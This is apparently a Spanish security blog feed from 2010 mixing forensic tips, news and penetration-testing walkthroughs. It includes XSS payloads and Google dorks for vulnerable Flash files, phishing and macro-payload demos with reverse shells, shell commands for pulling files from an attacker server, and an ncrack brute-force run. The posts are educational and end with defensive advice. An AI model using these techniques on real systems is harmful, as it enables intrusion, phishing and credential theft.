The Secure Corner

Cheat Sheet de Meterpreter

noreply@blogger.com (Ramon Vicens) — Thu, 17 Jun 2010 21:37:00 +0000

Nuevo Cheat Sheet de Meterpreter realizado por blueliv.

Sin lugar a dudas un "Chuletario" muy útil para tener a mano !

Saludos,

Métodos alternativos de análisis forense

noreply@blogger.com (Ramon Vicens) — Sun, 09 May 2010 22:12:00 +0000

En ocasiones, duarante el desarrollo de un análisis forense postmortem, podemos requerir de la realización de una extracción masiva de documentos e información. Incluso, se podría requerir escanear el sistema en búsqueda de malware, como troyanos, spyware, backdoors, etc.

Por ello, podemos recurrir a la utilización de herramientas que nos permitan acceder al contenido de la imagen DD bajo análisis, pudiendo montar el contenido de sus particiones como carpetas o unidades de disco en nuestro sistema de análisis.

Cabe indicar, que es importante asegurarse siempre trabajar desde una copia de análisis, asegurándonos que disponemos de un backup de la imagen original. Además de trabajar desde una copia de la imagen, es conveniente asegurarse que las herramientas que vamos a utilizar permiten montar la imagen en modo de "solo lectura".

Con el objetivo arriba indicado, disponemos de herramientas para:

Montar las particiones contenidas en nuestra imagen DD para acceder al contenido de las mismas y así poder ser analizadas con más facilidad
Realizar conversiones de formato DD a formato VMware/VirtualBox,... para poder disponer así de una máquina virtual a ser analizada. Ésta técnica es útil para análisis de ingeniería inversa si se ha confirmado que la máquina pudiera estar infectada.

Herramientas para montar particiones

Las siguientes herramienas nos permiten montar a partir de una imagen DD una o todas las particiones que ésta misma contenga:

Mount Image Pro
SmartMount
ImDisk
Filedisk
mount (linux)

Mientras que las 4 primeras herramientas son herramientas del entorno windows, también disponemos de la utilidad "mount" en sistemas UNIX, pudiendo montar la imagen DD como loopback, mediante el siguiente comando:

mount -o ro,noexec,loop,offset= imagen.dd /mnt/destino

Herramientas para crear un disco virtual

Liveview: Permite a raíz de una imagen DD y una sencilla interfaz gráfica, la creación de una máquina virtual que usa como dico base la imagen en cuestión a analizar.
Qemu: Es un emulador y virtualizador genérico de CPU que permite la ejecución de sistemas operativos y aplicaciones de una máquina a otra. Sin embargo, podemos aprovechar la utilidad de conversión de formatos para convertir una imagen DD a una imagen vmdk, usando por ejemplo el siguiente comando:

qemu-img convert imagendiscoendd.dd -O vmdk nombrediscovmdk.vmdk

VBoxManage: Pemite la creación de un disco virtual box a partir de una imagen DD. El siguiente comando, representa un ejemplo de cómo realizarlo:

VBoxManage convertdd imagendiscoendd.dd nombrediscovdi.vdi

Una vez creados nuestros discos virtuales, como es el caso de qemu y VBoxManage, tan solo deberemos crear una nueva máquina virtual que use el disco obtenido a partir de la imagen DD. Para ello, accederemos a las opciones avanzadas de creación de nuevas máquinas virtuales.

Como alternativa, y si vamos con cuidado, podemos editar cualquier fichero VMX de una máquina virtual existente para realizar un cambio de disco. Veamos a continuación los ficheros que tiene una máquina virtual VMware:

y a continuación, veamos el fichero .vmx que es el ficher de configuración de la máquina virtual:

Como podemos observar, esta máquina virtual dispone de un disco duro scsi, que podremos encontrar en la misma carpeta bajo el archivo binario "Other Linux 2.6.x kernel0000001.vmdk".

Como hemos podido ver, las máquinas virtuales no son más que ficheros de texto con sus correpondientes ficheros binarios de disco o de memoria, entre otros. Por ello, cabe destacar que LiveView en el fondo lo que realiza es la automatización y creación de dichos ficheros mediante una interfaz amigable sin realizar conversión de la imagen DD a vmdk.

Saludos,

Cross Site Scripting III

noreply@blogger.com (Ramon Vicens) — Wed, 14 Apr 2010 06:30:00 +0000

En los posts anteriores vimos cómo detectar XSS y evadir posibles filtros basados en listas negras de carácteres. Hoy, a modo de ejemplo, quiero presentar el framework BeEF que dada una vulnerabilidad de cross site scripting, nos permitirá disponer de un conjunto de "bots" que se conectarán a su "botmaster" para ejecutar las órdenes indicadas por el mismo.

Las funcionalidades que dispone BeEF por defecto son:

Módulo de autorun: Ejecución automática de determinados módulos javascript (Alert o Deface) cada vez que un bot se conecta contra el botmaster.
Clipboard: Módulo que permite obtener el contenido del portapapeles aprovechandose de características de Internet Explorer anterior a la versión 7.
Historial de navegación: Módulo que permite obtener el historial de navegación del bot usando técnicas de bruteforcing.
Iniciación de peticiones: Desde el botmaster, podríamos iniciar peticiones HTTP en nombre del bot o bajo la identificación (IP, CNAME,... ) del zombie, permitiendo descargar cualquier tipo de software/malware.
Port Scaner: Escaneo de puertos de la red dónde está conectado el zombie, permitiendo así, realizar un escaneo de puertos de la red interna a través de una vulnerabilidad de cross site scripting.
Ejecución de exploits del navegador
Inyección de código javascript: Permite la ejecución de culquier tipo de código desarrollado por uno mismo, permitiendo lanzar ataques no contemplados por BeEF.
Comunicación Inter-Protocol: Permite usar el navegador "infectado" como vía de comunicación con la red interna del zombie. Por ello, el "Content Body" HTTP será el protocolo con el que se desea dialogar, estableciendo un tunnel HTTP, ya que en la mayoría de casos, el protocolo destino obviará las cabeceras HTTP y se centrará en interpretar las cabeceras que viajan en el contenido del mensaje del mismo.

Como prueba de concepto, he "infectado" una máquina cliente a través del formulario que vimos en los posts anteriores, realizando en éste caso una redirección/recarga de la URL mediante el siguiente código:

Como se observa en la siguiente imagen, cuando el usuario navega hacia la URL vulnerable, es redirigido hacia el servidor web malicioso que dispone de los scripts BeEF que infectarán a la víctima.

A continuación activamos el autorun, cerramos el navegador y volvemos a visitar el formulario vulnerable....

Obtención del historial de navegación.....

Ejecución de exploits del navegador ...

Lo más fascinante es que todo esto lo podemos ejecutar mediante código javascript sin ser detectados por los dispositivos perimetrales, ya que éstos, no lo detectarán como malware!!

En conclusión. En éstos últimos posts, hemos visto que a pesar que los cross site scripting no se consideran tan críticos como una inyección SQL, tienen mucha más importancia de la que a simple vista puede parecer, ya que como hemos visto, podríamos:

Realizar un daño en la imagen corporativa de una empresa/organización y ocasionarle graves pérdidas económicas
Obtener información de los zombies infectados
Realizar escaneos de puertos de la red interna a través de los zombies
Establecer comunicaciones con recursos internos en nombre de las máquinas zombie
Infectar nuevas máquinas, abriendo nuevos canales de explotación

Saludos,

La problemática de los Cross Site Scripting II

noreply@blogger.com (Ramon Vicens) — Mon, 29 Mar 2010 06:00:00 +0000

La semana pasada, estuve hablando sobre la problemática de los cross site scripting, repasando los principales ataques que se pueden realizar explotando una vulnerabilidad de éste tipo. Esta semana, voy a poner algunos ejemplos al respecto.

Por ello, he creado una aplicación muy sencilla que nos servirá como prueba de concepto. Consta de un campo de formulario que se envía por método GET hacia el servidor, el cual contiene una pequeña aplicación PHP vulnerable a inyección de javascript cuyo código fuente es el siguiente:

$var=$_GET['var1'];

Como se puede observar, no se efectúa validación de los parámetros de entrada que provienen del usuario, fallando en la regla básica de seguridad de todo aplicativo.

Si realizamos una prueba inicial para comprobar qué filtrados realiza la aplicación, observamos lo siguiente:

Campo de fomulario que visualiza el usuario,

Valor de prueba que le insertamos ('"

Resultado obtenido y procesado por el código PHP anteriormente citado,

Visualización del código fuente que ha devuelto el servidor,

Como se ha podido observar, el mismo PHP (depende de la versión), proporciona escape de carácteres potencialmente peligrosos (mediante contrabarras), como por ejemplo ' y ", evitando ataques de inyección de código XSS, SQL, ...

Como comenté en el post anterior, existen medidas de escape de los filtros basados en listras negras o blacklist, que, dependiendo de los controles y la programación de la aplicación serán más o menos compleja su evasión.

Si volvemos a observar el código fuente devuelto por el servidor, el parámetro HTML "value" no se encuentra entre comillas, permitiendo a un atacante la inserción directa de código HTML.

NOTA: Muchas veces, es importante insertar los caracteres para romper lo mínimo el código fuente. En este caso, no insertamos el últumo ">" porque es insertado siempre por la aplicación. Análogamente para el primer ">". Otras veces, es posible que se deban usar la inserción de comentarios cómo medida de escape.

Como podreis observar si realizais la prueba, el servidor no escapará ningún carácter de los anteriormente insertados, produciendo el siguiente código HTML:

Que daría como resultado lo siguiente:

Pues como veis, hemos podido comprobar que el navegador del usuario (en éste caso el mío) ha ejecutado el código que le hemos insertado sacando por pantalla el valor de la cookie (que obviamente es nulo).

Una vez hemos comprobado que podemos ejecutar código javascript, se podrían realizar cualquiera de los ataques que hablamos en el post anterior, pero antes, debemos descubrir cómo escapar al filtro de PHP, y lograr introducir comillas.

Por ello, vamos a recurrir a un Cheat Sheet elaborado por Rsnake, el cual contiene varios métodos de evasión para diferentes situaciones. Si nos paramos a pensar un poco, en nuestro caso lo que necesitamos es escapar al filtro de comilla simple y comilla doble, por lo tanto, ¿por qué no transformar dichos caracteres en su equivalente CharCode (Valor decimal de la representación ASCII del carácter)?

La problemática de los Cross Site Scripting

noreply@blogger.com (Ramon Vicens) — Mon, 22 Mar 2010 07:00:00 +0000

Los ataques de Cross Site Scripting (XSS) son uno de los ataques más peligrosos y más subestimados que existen en la actualidad. Con éste tipo de ataques, una organización puede sufrir daño a la imagen corporativa y pérdida de información. Podemos recordar el reciente ataque a través de twitter a la web de la presidencia Española en el que a través de la distribución de un enlace malintencionado se "modificó" el contenido de la página.

¿Qué puede hacer un atacante a través de una vulnerabilidad de éstas características? Pues la verdad que dependerá un poco del tipo de cross site según sea:

Persistente: El código inyectado quedará almacenado y cada vez que se cargue la página, los usuarios legítimos ejecutarán el código.
Reflejado: Sólo los usuarios que carguen la URL malintencionada ejecutarán el código

Como podeis observar, la primera vía, será más fácil y cómoda para un atacante, sin embargo, no cabe olvidar a nuestras amigas las "redes sociales" que serán un mecanismo de distribución importante para casos donde el XSS sea reflejado. En general, mediante un XSS se podrán realizar ataques del tipo:

Obtención de cookies de usuario (redirección de la URL legítima hacia otra)
Redirección del usuario (Si tuvieramos un login vía formulario Web sobre HTTPS, ¿por qué no redireccionarlo hacia otro servidor al hacer el submit del formulario?)
Modificación de contenido Web

El problema de éste tipo de vulnerabilidades, es que se podrá hacer casi cualquier cosa que se nos pueda imaginar gracias a las tecnologías de client que disponemos en la actualidad (Flash, Javascript, applets,ruby, perl, ....) pudiendo realizar otro tipo de ataques más avanzados (usando IFRAMES ocultos) como:

Escaneo de puertos de servicios internos
Fingerprinting de servidores internos
Obtención información del cliente como el historial de navegación (...¿¿¿contraseñas guardadas en el navegador???....) que podrá permitir a un atacante obtener información de nuevos activos o recursos de una red interna.
Ejecución de exploits en el navegador que nos permitan aprovechar vulnerabilidades de las que rondan por ahí en la actualidad...
etc etc

¿Cómo vamos a proteger las aplicaciones? Pues existe tan solo 1 solución y que recibe el nombre de FILTRADO. Es una solución muy obvia pero no todo el mundo utiliza los mecanismos de filtrado más efectivos:

Filtrado por Whitelist: Se define una lista de carácteres/palabras legítimas que pueden utilizarse.
Filtrado por Blacklist: Se defines una lista de carácteres que no se podrán utilizar, como por ejemplo, "/", "

Inicialmente, uno puede pensar que el método de filtrado por blacklist podría ser el más eficiente y rápido de implantar, pero si consideramos que existen técnicas de evasión de filtrados, se puede llegar a la conclusión que el método más seguro será el uso de whitelists.

Saludos,

Sobre Ingeniería Social II

noreply@blogger.com (Ramon Vicens) — Mon, 15 Mar 2010 07:30:00 +0000

En un post anterior, hace varios días hablé sobre el framework de ingeniería social SET el cual nos permite, entre otros, la creación de websites y PDFs maliciosos. Con el post de hoy, me gustaría complementar el anterior con otra herramienta que nos permite insertar un payload malicioso en un fichero Excel.

La herramienta es xlsinjector, desarrollada por Keith Lee, permitiendo insertar una bind shell meterpreter al puerto 4444 como payload. La herramienta en sí, no explota ninguna vunerabilidad software del paquete de Microsoft sino que utiliza un código visual basic que genera el código pertinente para inyectar la shell en memoria.

En realidad, para realizar la explotación se requiere la intervención de varios factores:

Que el usuario ejecute el archivo excel
Que la máquina del usuario permita la ejecución de macros desde Excel
Que no existan relgas de filtrado que permitan bloquear el acceso a dicho puerto

Veamos la siguiente prueba de concepto....

Creamos el XLS malicioso

Se lo enviamos al usuario destino acompañado de algunos engaños que le motiven a ejecutar el fichero. En la siguiente figura se puede observar el resultado de la ejecución del fichero prueba_con_SHELL.xls.

Una vez ejecutado el fichero, tan solo se requiere de Metasploit y de su módulo multi handler para ejecutar una bind shell meterpreter...

Una vez obtenida la shell meterpreter se podrían escalar privilegios mediante el comando getsystem, que entre otras, aprovecha la vulnerabilidad de la que hablé en posts anteriores de escalada de privilegios.

Para desarrollar este ataque en un entorno real, como he comentado anteriormente, se requiere de la interacción de los usuarios, la permisividad de ejecución de macros y de las reglas de filtrado. Pero si vamos al código fuente de la herramienta y cambiamos el payload por otro que efectúe una conexión inversa a través del puerto 80, ¿ cuantos entornos serían capaces de detectar el ataque?

No solo las medidas de seguridad perimetras nos van a ayudar a mantener a nuestra organización bien protegida. Por ello, quiero destacar una vez más, lo importante que es incluir la formación y concienciación de los usuarios como medida de seguridad de la Organización. De hecho, esto se alinea perfectamente con el concepto de seguridad en profundidad, el cual defiende que se apliquen mecanismos de protección a diferentes niveles.

Saludos,

Algunos videos educativos

noreply@blogger.com (Ramon Vicens) — Sat, 06 Mar 2010 20:23:00 +0000

Sin ánimo de hacer publicidad a Symantec, quiero referenciar algunos videos que publicaron en una campaña comercial del 2008. Desde mi punto de vista, son unos videos muy educativos enfocados a malware y cibercrimen.

Lógicamente, la solución de todos los problemas es que compres su solución, pero al margen de ello, me parece francamente interesante los conceptos que describen y la manera en que lo hacen.

Aquí van !

Saludos,

Sobre Ingenieria Social

noreply@blogger.com (Ramon Vicens) — Sun, 28 Feb 2010 21:30:00 +0000

En la actualidad, las empresas incorporan mecanismos de seguridad en su entorno perimetral e incluso interno para prevenir y detectar intrusiones externas. Es más, muchas de ellas se han concienciado de la importancia de proteger sus activos tecnológicos y la información que éstos manipulan, pero ¿qué pasa con los usuarios?

Como es sabido, "una cadena se rompe por el eslabón más débil" y desde el punto de vista de la seguridad de la información, éste eslabón son los usuarios. Éstos son los más propensos a cometer violaciones en la seguridad, ya sea de manera intencionada o bien siendo víctimas de engaños efectuados mediante técnicas de Ingeniería Social.

Prueba de ello, son todas aquellas vulnerabilidades de software de usuario (Adobe, IE, Firefox, ...) que se han publicado a lo largo de éstos últimos años. De modo que voy a aprovechar éste post para introducir una herramienta desarrollada exclusivamente a realizar ataques de ingeniería social. La herramienta es Social Engineering Toolkit que forma parte del framework de Metasploit e integrado en el framework de The Social Engineering Framework con la que básicamente se pueden realizar:

Envío de e-mails masivos
Creación de sites fraudulentos
Creación de payloads

Cada una de las capacidades de SET permite explotar vulnerabilidades del software cliente. Por ejemplo, supongamos que enviamos a un empleado de la empresa ACME un correo dónde se le adjunta un archivo PDF. Veamos un pequeño ejemplo práctico:

Arrancamos SET ....

Indicamos que queremos un ataque phishing vía e-mail

Creamos el exploit, que en éste caso será un PDF con un ejecutable embedido el cual contendrá como payload una shell inversa de meterpreter ....

Indicamos que queremos realizar un envío por e-mail de nuestro "PDF" especificándole el tema o asunto del correo....

Le indicamos el e-mail del destinatario, el remitente y la forma de envío del correo y se nos iniciará un listener que aguardará a que la víctima abra el PDF y por lo tanto, se conecte inversamente a nuestra máquina.

Cuando el usuario finalmente abre el PDF, en éste caso, se le presenta una pantalla solicitándole la ejecución de un comando desde cmd. Dado que a nuestro usuario le interesa mucho el PDF, decide abrirlo ....... (En este caso requerimos alta interacción del usuario, pero se podría haber mandado algún buffer overflow para Adobe que no hubiera lanzado mensaje alguno)

En el atacante, podemos ver como de manera casi transparente al usuario, se ha obtenido una conexión inversa, habiendo inyectado una consola meterpreter.

Si abrimos la consola meterpreter mediante el comando sessions -i 1 podremos obtener finalmente acceso al sistema ....

Para concluir, me gustaría reflexionar acerca de la prueba de concepto anterior. ¿Qué pasaría si en lugar de utilizar el puerto 31337, se hubiera utilizado el 80? ¿habríamos saltado las reglas de filtrado perimetral? ¿ Nos hubiera bloqueado algún proxy o algún sistema de inspección de contenidos? ¿ Cúantas empresas tienen este nivel de seguridad perimetral? No solo las empresas, sino los usuarios domésticos también pueden verse atacadas mediante similares técnicas para pasar a formar parte de botnets.

Como se ha visto, mediante técnicas que utilizan la ingeniería social es relativamente fácil obtener acceso a los usuarios de una organización, de modo que la formación y concienciación de los usuarios debe formar parte del ciclo de securización de la información, siempre y cuando no queramos que la cadena se rompa por el eslabón más débil!

Saludos,

Transferir ficheros a través de una Bind/Reverse shell

noreply@blogger.com (Ramon Vicens) — Thu, 18 Feb 2010 00:15:00 +0000

En uno de los posts anteriores, hablé de escalar privilegios en windows, mediante un exploit local (pre-compilado) una vez se ha obtenido pivilegios de usuario en el sistema con otro exploit remoto. Pero ¿cómo podemos subir el exploit local a la máquina objetivo?

Existen varias formas para subir a un sistema los archivos que deseemos, pero entre otras me gustaría citar las siguientes:

TFTP
Shell Inline
Mediante Internet Explorer

las explico a continuación...

TFTP

Las máquinas Microsoft Windows desde su versión NT hasta la versión XP incorporan un cliente TFTP en la carpeta del sistema C:\WINNT\System32>. De modo que una manera muy sencillar de transmitir ficheros desde una máquina atacante a una máquina comprometida es:

Desde la shell remota:

tftp -i GET

Cambio de los permisos de lectura a escritura (TFTP usa copia por defecto en solo lectura)

attrib -r

Las grandes ventajas de usar este método son la sencillez, rapidez y que el propio Windows (a no ser que el propio administrador lo haya prohibido por plantillas de seguridad o GPOs) incorpora dicho cliente.

La principal desventaja es que todo buen administrador de red filtraría el puerto UDP / 69 que usa dicho cliente. De modo que ante un ataque externo no sería tan trivial realizar la transferencia.

Shell Inline

Si ya tenemos una shell abierta, por qué no usarla para realizar una transferencia a través de la misma ventana ?

El método consisten en:

Realizar un echo del código hexadecimal bytecode a un fichero de texto

exe2bat.exe

Seguidamente hacer un "Copiar y Pegar" dentro de la misma shell, creando el fichero en la máquina víctima

La herramienta exe2bat.exe genera un código hexadecimal que se compilará en la shell remota cuando dicho código se pegue en ella sin abrir ninguna otra conexión alternativa a la ya establecida por el exploit remoto.

Frente a la ventaja de ser menos "ruidoso" en el sistema, tiene por contra un límite de 64 Kbytes de transferencia de datos.

Internet Explorer

Dado que en la actualidad Internet Explorer forma parte del sistema operativo, ¿por qué no aprovecharlo para realizar descargas?

Por ejemplo, si en una máquina atacante inicializamos un servidor web que contenga el fichero calc.exe, podríamos desde la shell lanzar el siguiente comando:

start iexplore http:///calc.exe

Dado que es un ejecutable, Internet Explorer solicitará si se desea descargar o no el fichero, hecho que desde una consola podría ocasionar problemas. Pero ... habeis pensado... ¿qué pasaría si el fichero a descargar no fuera exactamente un .exe? En caso de descargarse, ¿Dónde se guardaría?

Es importante conocer la existencia de éstas maneras de transmisión de ficheros para saber cómo podemos securizar los sistemas de modo que las medidas que debería tomar un administrador de redes y sistemas son, además de implantar mecanismos de detección y prevención, aplicar mecanismos de protección como:

Buena política de filtrado en el entorno de red perimetral
Buena política de filtrado en el entorno host/servidor
No permitir la ejecución de determinados binarios del sistema. Restricción general de los permisos del equipo. En general, realizar un buen hardening de los mismos
Ojo con las navegaciones desde servidores públicos de la DMZ, NUNCA SE DEBE PERMITIR LA NAVEGACIÓN DESDE UN SERVIDOR!!!

Saludos,

OWASP Broken Web Applications Project

noreply@blogger.com (Ramon Vicens) — Tue, 16 Feb 2010 00:02:00 +0000

OWASP Broken Web Applications Project es una máquina virtual VMware que incluye diversas aplicaciones web con vulnerabilidades conocidas. Las aplicaciones que incluye dicha máquina son las siguientes:

OWASP WebGoat versión 5.3-SNAPSHOT
OWASP Vicnum versión 1.3
Mutillidae versión 1.3
Damm Vulnerable Web Application versión 1.06
OWASP CSRFGuard Test Application versión 2.2
Mandiant Struts Forms
Formularios ASP.NET
Formularios con DOM Cross Site Scripting
WordPress 2.0.0
phpBB 2.0.0
Yazd

Al parecer todavía no están documentadas todas las vulnerabilidades de las aplicaciones de la máquina virtual. Por ello, se mantiene abierto un wiki en Google Code para disponer de un listado completo de las mismas.

La máquina se puede descargar desde Aquí.

Muy buen recursos para perder un par de horas practicando ....

Saludos,

Cross Site Scripting en ficheros Flash

noreply@blogger.com (Ramon Vicens) — Wed, 10 Feb 2010 07:00:00 +0000

Uno de los artículos que me ha sorprendido recientemente ha sido "XSS vulnerabilities in 8 millions flash files" encontrado a traves de Pentester.es.

Como es de suponer, el título captó mi atención... ¿¿¿8 millones ??? El autor en su post, nos enseña cómo encontrar archivos flash a través de las búsquedas avanzadas de google y con ello, obtener archivos potencialmente vulnerables a través de una inyección de javascript.

El concepto es muy sencillo, todos aquellos flash, en general publicitarios que cuentan el número de clicks que se han realizado sobre ellos, que dispongan de un link a otra URL, muchas veces pueden tener implementada la función geturl() que si no se parsean debidamente los parámetros de entrada, nos permitiría ejecutar códigos javascript. Veamos....

Suponemos un flash que dentro de su código tenemos lo siguiente:

if (j == 3 && Number(realVersion[j]) == Number(version[j])) {

setSessionFlash();

getURL(url, '');

break;

}

o bien ...

button 17 {

on (release) {

getURL(clickTag, '');

}

Como vemos, en ambos ejemplos, getURL se ejecuta directamente a partir del parámetro (url o clickTag) que le vamos a proporcionar a través de la URL del navegador....... ufffff esto huele!!

Si un usuario con mala idea cambia el valor de nuestro parámetro del siguiente modo, se ejecutará el código.

url=javascript:alert('Soy Vulnerable')

clickTag=avascript:alert('Soy Vulnerable')

Para los curiosos, podreis encontrar los ficheros flash vulnerables mediante búsquedas en google. La que mejor resultados me ha producido a mi han sido las siguientes:

filetype:swf inurl:url=http

filetype:swf inurl:clickTAG=http

De éste modo, evitamos falsos positivos del tipo http://blabalabala/url/blalala/flash.swf y sumando todos aquellos que no realizan llamada a getURL o bien ésta está debidamente parseada, obtendríamos algunos menos resultados de los 8 millones que el autor remarcaba... aunque, no deja de ser sorprendente la cantidad de resultados.

Saludos,

¿Está de moda el hacking?

noreply@blogger.com (Ramon Vicens) — Sun, 07 Feb 2010 07:06:00 +0000

Recientemente he encontrado un post en uno de los blogs que habitualmente sigo. De hecho es un artículo que merece mucho la pena su lectura, por ello, recomiendo que lo leais. El artículo es del blog "Apuntes de Seguridad de la Información" y se realiza una reflexión sobre los incidentes de seguridad que se han hecho públicos recientemente. Muy interesante!

Sería interesante prestar atención al mensaje que intenta transmitir y a los links a los que el artículo enlaza.

Ver Artículo.

Saludos,

Apple vs Seguridad

noreply@blogger.com (Ramon Vicens) — Fri, 05 Feb 2010 16:05:00 +0000

Hasta hace poco Windows siempre ha sido el foco de atención para todos los desarrolladores de software malicioso, o más comúnmente conocido como malware y todos sus subtipos virus, troyanos, worms (gusanos), etc...

Lo que quiero remarcar para todos los usuarios de Mac, es si realmente son más seguros que un PC convencional con Windows. El éxito de Apple en sus diversos productos como iPhone, iPod, Macbooks y seguramente con su nuevo producto iPad ha hecho que muchos desarrolladores cambien la tendencia de escritura de malware. De hecho este pasado año ya vimos como aparecían nuevos ataques a la plataforma MacOS.

Entonces me pregunto, ¿Es real la sensación de seguridad que tienen todos los usuarios de MacOS? Deberían los usuarios de mac salir de su estado de confianza para ponerse las pilas y estar algo más atentos al fraude electrónico alrededor de la plataforma de Apple?

Dejo algunas referencias para reflexión propia:

Para todos aquellos afectados, proporciono un enlace a una guía de fortificación / hardening de plataformas Mac OS.

Mac OS Security Configuration Guides

VMware publica una guías de securización de entornos virtualizados

noreply@blogger.com (Ramon Vicens) — Fri, 05 Feb 2010 15:42:00 +0000

Vmware ha publicado unas guías de securización de los entornos virtualizados vSphere v4.0. Según el blog de VMware, las guías se dividen en:

Introducción
Máquinas Virtuales
Host
vNetwork
vCenter
Console OS (ESX)

Aquí dejo el enlace a los documentos.

Recordad, que además de securizar el entorno de virtualización, cabe recordar que se deberá aplicar una securización del sistema operativo de las máquinas virtuales. Para ello, también existen otras guías de CIS, NIST y NSA.

Saludos,

Nuevas vulnerabilidades para Internet Explorer

noreply@blogger.com (Ramon Vicens) — Fri, 05 Feb 2010 15:26:00 +0000

Despúes de la vulnerabilidad crítica 'Aurora' que se detectó el pasado mes de Enero, a Internet Explorer, le han salido dos nuevas vulnerabilidades. Esta vez reportadas por los profesionales de Core Security el pasado 3 de Febrero.

La descripción de la vulnerabilidad pone lo siguiente:

"This advisory describes two vulnerabilities that provide access to any file stored in on a user's desktop system if it is running a vulnerable version of Internet Explorer. These vulnerabilities can be used in attacks combined with a number of insecure features of Internet Explorer to provide remote access to locally stored files without the need for any further action from the victim after visting a website controlled by the attacker. The vulnerabilities are simple variations of bugs disclosed previously in CoreLabs Security Advisories CORE-2008-0103 [1] and CORE-2008-0826 [2]. Exploitation of these vulnerabilities requires enticing users to click on URLs otherwise visit a malicious website controlled by the attacker but no further user interaction is needed. As a result an attacker would gain the ability to read any file stored on the user's desktop system but will not be able to fully compromise it to execute arbitrary code without restrictions."

Las versiones vulnerables reportadas por Core Security son:

Internet Explorer 5.01 SP4 on Windows 2000 sp4
Internet Explorer 6sp1 on Windows 2000 sp4
Internet Explorer 6sp2 on Windows XP sp2
Internet Explorer 6sp2 on Windows XP sp3
Internet Explorer 7 on Windows XP sp2
Internet Explorer 7 on Windows XP sp3
Internet Explorer 7 on Windows Vista sp1
Internet Explorer 7 on Windows Vista sp2
Internet Explorer 7 on Windows Server 2003 sp2 if Protected Mode if OFF and not using Enhanced Security Configuration
Internet Explorer 7 on Windows Server 2008 if Protected Mode if OFF and not using Enhanced Security Configuration
Internet Explorer 8 on Windows XP sp2
Internet Explorer 8 on Windows XP sp3
Internet Explorer 8 on Windows Vista sp1 if Protected Mode if OFF
Internet Explorer 8 on Windows Vista sp2 if Protected Mode is OFF
Internet Explorer 8 on Windows 7 if Protected Mode if OFF
Internet Explorer 8 on Windows Server 2003 sp2 if Protected Mode if OFF and not using Enhanced Security Configuration
Internet Explorer 8 on Windows Server 2008 R2 if Protected Mode if OFF and not using Enhanced Security Configuration

Os dejo la publicación del Advisory de Microsoft. Para todos aquellos afectados, desde mi punto de vista es que activen el "Protected Mode" en caso de usar Windows Vista / 7 / 2008 y en el caso de XP esperar a obtener un parche de Microsoft. Por ello, como se recomendó para el caso de la vulnerabilidad 'Aurora', la solución temporal puede pasar por utilizar un navegador alternativo.

Saludos,

Nuevas Herramientas "Password Cracking"

noreply@blogger.com (Ramon Vicens) — Thu, 04 Feb 2010 14:01:00 +0000

Me gustaría presentar dos nuevas herramientas para Cracking de contraseñas que tienen buena pinta aunque en la actualidad se encuentran en fase de desarrollo y mejora. Son dos herramientas con un mismo objetivo, pero con conceptos de funcionamiento distintos.

Una de ellas, ncrack, es una herramienta de ataque a contraseñas en modo online, es decir, con ella y un diccionario de usuarios y contraseñas, se podrá atacar y por lo tanto, verificar la fortaleza de los mecanismos de autenticación de diversos protocolos como ftp, ssh, http, telnet .... Podríamos decir que es una herramienta similar a hydra, medusa, brutessh que todavía está en fase alpha y por ello no soporta la misma cantidad de protocolos como las herramientas anteriormente citadas. La principal diferencia de las mismas con ncrack es que ésta permite ejecutarse contra varios equipos especificando rangos de IPs, con lo cual facilitará verificaciones masivas.

Veamos....

ncrack -v -v -U usr.txt -P passwd.txt ftp://172.16.139.128:21

Starting Ncrack 0.01ALPHA ( http://ncrack.org ) at 2010-02-04 11:09 UTC

Discovered credentials for ftp on 172.16.139.128 21/tcp:

172.16.139.128 21/tcp ftp: ftp ftp

Ncrack done: 1 service scanned in 207.07 seconds.

Probes sent: 14 | timed-out: 2 | prematurely-closed: 0

Ncrack finished.

La otra herramienta que quería citar es una herramienta desarrollada por Matt Weir que actua en modo offline, es decir, a partir de un fichero de contraseñas como pueden ser entre otras John the Ripper, Lophtcrack, ... La principal diferencia es que la nueva herramienta, permite realizar un ataque al fichero de contraseñas en base a un estudio probabilístico. Se parte de un diccionario de palabras que se van a priorizar probabilísicamente con el objetivo de acelerar el ataque.

Escalando privilegios en Windows

noreply@blogger.com (Ramon Vicens) — Wed, 03 Feb 2010 10:44:00 +0000

Hace unos días desde Hispasec, anunciaban la existencia de una nueva vulnerabilidad en equipos windows que en el caso de ser explotada, permite elevar privilegios de usuario a SYSTEM. Las plataformas afectadas parece que son desde NT, 2000, 2003, 2008, XP, Vista y Windows 7 a causa de un fallo de diseño de las arquitecturas de 32 bits.

Para simplificar el caso, obviaré toda la parte de ejecutar el exploit remoto, obtener privilegios de usuario en el sistema y luego subir el exploit a la máquina para escalar los privilegios. Entonces directamente, voy a crear un usuario con permisos de usuario sobre una máquina virtual Windows XP SP2. Subo el exploit y veamos ...

Antes ....

y después ....

Como podemos observar, se nos ha abierto otra consola en la que hemos ejecutado un "whoami" y vemos que tenemos permisos de SYSTEM, y por lo tanto, pleno control de la máquina.

Como ya he comentado, este solo sería el paso final de escalada de privilegios, de modo que he obviado gran parte del trabajo de reconocimiento, análisis de vulnerabilidades, explotación de vulnerabilidades y obtención de usuario en el equipo objetivo.

Por el momento, no existe ningún parche que solucione dicha vulnerabilidad, de modo que la única solución temporal es desde el Panel de Control impedir la ejecución de aplicaciones de 16 bits desde la consola de políticas.

(gpedit.msc) --> "Configuración de equipo" --> "Plantillas administrativas" --> "Componentes de Windows" --> "Compatibilidad de aplicación" y habilitar la política "Impedir el acceso a aplicaciones de 16 bits".

Saludos,

¿Os acordais de Windows 3.1?

noreply@blogger.com (Ramon Vicens) — Wed, 03 Feb 2010 09:17:00 +0000

Para los que tengan ganas de recordar los tiempos pasados, dejo Aquí una referencia de una interfaz de Windows 3.1 desarrollada por Michael Vincent.

Permite acceder a MS-DOS, al panel de control, navegador e incluso al mítico buscaminas!

Saludos,

noreply@blogger.com (Ramon Vicens) — Mon, 01 Feb 2010 22:33:00 +0000

Aquí dejo algunos libros y papers de interés. Espero en breve poder ir ampliando el contenido de esta sección.

Libros

Hacking Exposed 6th Edition, Stuart McClure, Joel Scambray, George Kurtz
Google Hacking for Penetration Testers, Johnny Long
Windows Forensics Analysis, Harlan Carvey
Análisis Forense Digital en Entornos Windows, Juan Garrido Caballero, Juan Luis G. Rambla, Chema Alonso

Papers

Pentesting

Why Crack When You Can Pass the Hash? (Christopher Hummel)
